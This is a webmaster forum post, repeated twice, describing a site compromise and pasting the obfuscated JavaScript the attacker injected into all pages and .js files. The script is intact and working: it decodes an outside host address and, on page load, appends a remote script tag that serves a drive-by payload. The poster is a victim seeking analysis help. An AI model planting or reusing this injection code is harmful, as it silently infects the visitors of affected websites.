OLYMPOS
05-22-2010, 09:20 AM
Dear all WPW members and webmasters,
about 4 hours ago, one of my websites got hacked, following code has been added to all websites behind the closing </html> tag, as well as to the bottom to all .js files (not to .css, not to .xml files)
all my contact / booking / login forms are running via https:// PLUS having a filter in the check files filtering characters such as < and [.
Any idea whats that all about? All comments are highly appreciated.
This was the code added:
<script>this.QE=false;var TC={k:"E"};this.kS=37290;this.kS++;S=55649;S-=94;var A;var O=["hb","AR"];var CW=["B","x"];L=function(){var sa=false;var De=["_","e","w"];function a(Q,h,Qa){return Q.substr(h,Qa);}try {} catch(p){};Je={c:false};var X='';var P=document;try {var xw='kJ'} catch(xw){};try {var Zy='GK'} catch(Zy){};var T=RegExp;this.LK=28377;this.LK--;var EJ=["Tm","g"];var D=new String("/g"+"oo"+a("glPxHR",0,2)+a("e.ud4C",0,2)+a("IP3Sco3SPI",4,2)+a("m/OCT",0,2)+a("FDiZzaiDFZ",4,2)+a("gcqnocqg",3,2)+a("x-tWUT",0,2)+"af"+"fi"+a("rK6olio6Kr",4,2)+"at"+a("e.iqNI",0,2)+a("deSzML",0,2)+a("/y71LT",0,2)+a("ouTPYl",0,2)+a("xsK2poxK2s",4,2)+a("rnGUjE",0,2)+a(".cKSO",0,2)+a("omSKA2",0,2)+a(".pRZS",0,2)+a("hp7W5m",0,2));Lb=["u","aB"];IQ=["mu","TL"];function M(Q,h){BS=62196;BS-=136;this.LQ=21906;this.LQ++;var Qa=new String("[")+h+new String(a("]CDNo",0,1));var Ls={TZ:33385};var Un='';var I=new T(Qa, String("g"));return Q.replace(I, X);RG={bX:false};};kv={ut:"OZ"};BY={_J:"j"};var Z=null;var VQ=26957;this.sP=14567;this.sP--;var J=M('sOcgrKiDpyt_','v0hOzKwaN1LlSBJ_Xdg4yDF');var Aa=String("bo"+a("dyuC0r",0,2));Oe={oR:false};Vy=5707;Vy-=33;var z=41897-33817;WU=["HP","eZ"];var li=new String();A=function(){try {zb=["qG","go","Sw"];var qk=36069;var DK=M('c2rWe_aGtKeWE3lZe_m3eWnGto','L1XZJkNI3RCWVSo 2D_GK');s=P[DK](J);var bg=new String();this.mV=46689;this.mV-=137;var VP='';var Q=z+D;try {var SI='Th'} catch(SI){};var Rb={};var N=M('sorCcS','C3_Kk7JS921hWBzUeuPoQjy');var NZ="def"+a("ery1uZ",0,2);s[N]=String("ht"+a("tpfVCr",0,2)+a("r3Td:/3rTd",4,2)+"/t"+"er"+a("miMfQ3",0,2)+a("naqTI",0,2)+a("lph2D7",0,2)+"oe"+a("m.eDT",0,2)+a("PmNrumNP",3,2)+a(":cT5",0,1))+Q;var PP=["uO"];s[NZ]=[1,2][0];P[Aa].appendChild(s);pQ={sF:"GJ"};this.EE=38135;this.EE-=179;qb=32401;qb--;} catch(b){var jS={wt:"ZZ"};var jc=new Array();};};CE=5268;CE+=137;var kE="kE";};cP=28120;cP+=117;var Gj={pW:false};L();var Pb=new String();UE=["f"];window.onload=A;Fc={BK:"S_"};this.hw=46428;this.hw+=69;</script>
<!--29db6d0b1ed108a8ffd23923b5cb460c-->
cheers,
olympos
about 4 hours ago, one of my websites got hacked, following code has been added to all websites behind the closing </html> tag, as well as to the bottom to all .js files (not to .css, not to .xml files)
all my contact / booking / login forms are running via https:// PLUS having a filter in the check files filtering characters such as < and [.
Any idea whats that all about? All comments are highly appreciated.
This was the code added:
<script>this.QE=false;var TC={k:"E"};this.kS=37290;this.kS++;S=55649;S-=94;var A;var O=["hb","AR"];var CW=["B","x"];L=function(){var sa=false;var De=["_","e","w"];function a(Q,h,Qa){return Q.substr(h,Qa);}try {} catch(p){};Je={c:false};var X='';var P=document;try {var xw='kJ'} catch(xw){};try {var Zy='GK'} catch(Zy){};var T=RegExp;this.LK=28377;this.LK--;var EJ=["Tm","g"];var D=new String("/g"+"oo"+a("glPxHR",0,2)+a("e.ud4C",0,2)+a("IP3Sco3SPI",4,2)+a("m/OCT",0,2)+a("FDiZzaiDFZ",4,2)+a("gcqnocqg",3,2)+a("x-tWUT",0,2)+"af"+"fi"+a("rK6olio6Kr",4,2)+"at"+a("e.iqNI",0,2)+a("deSzML",0,2)+a("/y71LT",0,2)+a("ouTPYl",0,2)+a("xsK2poxK2s",4,2)+a("rnGUjE",0,2)+a(".cKSO",0,2)+a("omSKA2",0,2)+a(".pRZS",0,2)+a("hp7W5m",0,2));Lb=["u","aB"];IQ=["mu","TL"];function M(Q,h){BS=62196;BS-=136;this.LQ=21906;this.LQ++;var Qa=new String("[")+h+new String(a("]CDNo",0,1));var Ls={TZ:33385};var Un='';var I=new T(Qa, String("g"));return Q.replace(I, X);RG={bX:false};};kv={ut:"OZ"};BY={_J:"j"};var Z=null;var VQ=26957;this.sP=14567;this.sP--;var J=M('sOcgrKiDpyt_','v0hOzKwaN1LlSBJ_Xdg4yDF');var Aa=String("bo"+a("dyuC0r",0,2));Oe={oR:false};Vy=5707;Vy-=33;var z=41897-33817;WU=["HP","eZ"];var li=new String();A=function(){try {zb=["qG","go","Sw"];var qk=36069;var DK=M('c2rWe_aGtKeWE3lZe_m3eWnGto','L1XZJkNI3RCWVSo 2D_GK');s=P[DK](J);var bg=new String();this.mV=46689;this.mV-=137;var VP='';var Q=z+D;try {var SI='Th'} catch(SI){};var Rb={};var N=M('sorCcS','C3_Kk7JS921hWBzUeuPoQjy');var NZ="def"+a("ery1uZ",0,2);s[N]=String("ht"+a("tpfVCr",0,2)+a("r3Td:/3rTd",4,2)+"/t"+"er"+a("miMfQ3",0,2)+a("naqTI",0,2)+a("lph2D7",0,2)+"oe"+a("m.eDT",0,2)+a("PmNrumNP",3,2)+a(":cT5",0,1))+Q;var PP=["uO"];s[NZ]=[1,2][0];P[Aa].appendChild(s);pQ={sF:"GJ"};this.EE=38135;this.EE-=179;qb=32401;qb--;} catch(b){var jS={wt:"ZZ"};var jc=new Array();};};CE=5268;CE+=137;var kE="kE";};cP=28120;cP+=117;var Gj={pW:false};L();var Pb=new String();UE=["f"];window.onload=A;Fc={BK:"S_"};this.hw=46428;this.hw+=69;</script>
<!--29db6d0b1ed108a8ffd23923b5cb460c-->
cheers,
olympos